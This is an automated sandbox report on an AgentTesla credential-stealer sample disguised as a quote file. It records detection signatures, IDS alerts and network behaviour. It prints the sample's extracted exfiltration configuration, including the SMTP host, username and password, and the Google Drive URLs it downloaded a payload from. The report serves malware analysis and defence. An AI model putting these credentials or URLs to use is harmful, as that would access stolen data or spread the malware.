Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quote_220072.exe

Overview

General Information

Sample name:Quote_220072.exe
Analysis ID:1546663
MD5:ac900546c8bf5b3be3184502d0d2d7ba
SHA1:6427b2e160082bdb6a5b0213a3de348986f31530
SHA256:23df64fa762b5942d08dc6bf6f5afc75fc932519a96070af492e237b5483747f
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Quote_220072.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\Quote_220072.exe" MD5: AC900546C8BF5B3BE3184502D0D2D7BA)
    • Quote_220072.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\Quote_220072.exe" MD5: AC900546C8BF5B3BE3184502D0D2D7BA)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: Quote_220072.exe PID: 7888JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Quote_220072.exe PID: 7888JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 199.79.62.115, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quote_220072.exe, Initiated: true, ProcessId: 7888, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49740
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-01T12:15:13.891888+010020229301A Network Trojan was detected20.109.210.53443192.168.2.949735TCP
              2024-11-01T12:15:52.715680+010020229301A Network Trojan was detected20.109.210.53443192.168.2.949741TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-01T12:14:50.254129+010020301711A Network Trojan was detected192.168.2.949740199.79.62.115587TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-01T12:15:46.463898+010028555421A Network Trojan was detected192.168.2.949740199.79.62.115587TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-01T12:15:46.463898+010028552451A Network Trojan was detected192.168.2.949740199.79.62.115587TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-01T12:15:39.027883+010028032702Potentially Bad Traffic192.168.2.949738172.217.18.14443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-01T12:14:50.254129+010028397231Malware Command and Control Activity Detected192.168.2.949740199.79.62.115587TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-01T12:14:50.254129+010028400321A Network Trojan was detected192.168.2.949740199.79.62.115587TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Quote_220072.exe.7384.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
              Source: Quote_220072.exeReversingLabs: Detection: 55%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: Quote_220072.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.9:49739 version: TLS 1.2
              Source: Quote_220072.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.9:49740 -> 199.79.62.115:587
              Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49740 -> 199.79.62.115:587
              Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.9:49740 -> 199.79.62.115:587
              Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.9:49740 -> 199.79.62.115:587
              Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.9:49740 -> 199.79.62.115:587
              Source: global trafficTCP traffic: 192.168.2.9:49740 -> 199.79.62.115:587
              Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
              Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49741
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49738 -> 172.217.18.14:443
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49735
              Source: global trafficTCP traffic: 192.168.2.9:49740 -> 199.79.62.115:587
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
              Source: Quote_220072.exe, 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
              Source: Quote_220072.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error...
              Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: Quote_220072.exe, 00000005.00000002.2567555318.0000000004338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: Quote_220072.exe, 00000005.00000002.2567555318.0000000004374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R
              Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775266109.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000438D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1746407195.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download
              Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download%=
              Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download7
              Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=downloadQ
              Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=downloady
              Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/t
              Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/y
              Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.9:49739 version: TLS 1.2
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_6FF823510_2_6FF82351
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_348813B85_2_348813B8
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_348841405_2_34884140
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_34884D585_2_34884D58
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_348844885_2_34884488
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377EDE385_2_377EDE38
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377E45A85_2_377E45A8
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377E8BE85_2_377E8BE8
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377EF2105_2_377EF210
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377E4FA05_2_377E4FA0
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377E83305_2_377E8330
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377E7BA85_2_377E7BA8
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_379164005_2_37916400
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_37919C305_2_37919C30
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_379135705_2_37913570
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_3791B3B25_2_3791B3B2
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_379336085_2_37933608
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_379319A05_2_379319A0
              Source: Quote_220072.exeStatic PE information: invalid certificate
              Source: Quote_220072.exe, 00000005.00000002.2585542298.00000000346B9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quote_220072.exe
              Source: Quote_220072.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@3/3
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
              Source: C:\Users\user\Desktop\Quote_220072.exeFile created: C:\Users\user\overlaysJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeMutant created: NULL
              Source: C:\Users\user\Desktop\Quote_220072.exeFile created: C:\Users\user\AppData\Local\Temp\nsb671F.tmpJump to behavior
              Source: Quote_220072.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Quote_220072.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\Quote_220072.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Quote_220072.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Quote_220072.exeReversingLabs: Detection: 55%
              Source: C:\Users\user\Desktop\Quote_220072.exeFile read: C:\Users\user\Desktop\Quote_220072.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Quote_220072.exe "C:\Users\user\Desktop\Quote_220072.exe"
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess created: C:\Users\user\Desktop\Quote_220072.exe "C:\Users\user\Desktop\Quote_220072.exe"
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess created: C:\Users\user\Desktop\Quote_220072.exe "C:\Users\user\Desktop\Quote_220072.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile written: C:\Users\user\Music\antithetic.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Quote_220072.exeStatic file information: File size 1197664 > 1048576
              Source: Quote_220072.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_6FF82351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF82351
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377E1A28 pushfd ; ret 5_2_377E1A2B
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 5_2_377E19EE pushfd ; ret 5_2_377E19F1
              Source: C:\Users\user\Desktop\Quote_220072.exeFile created: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
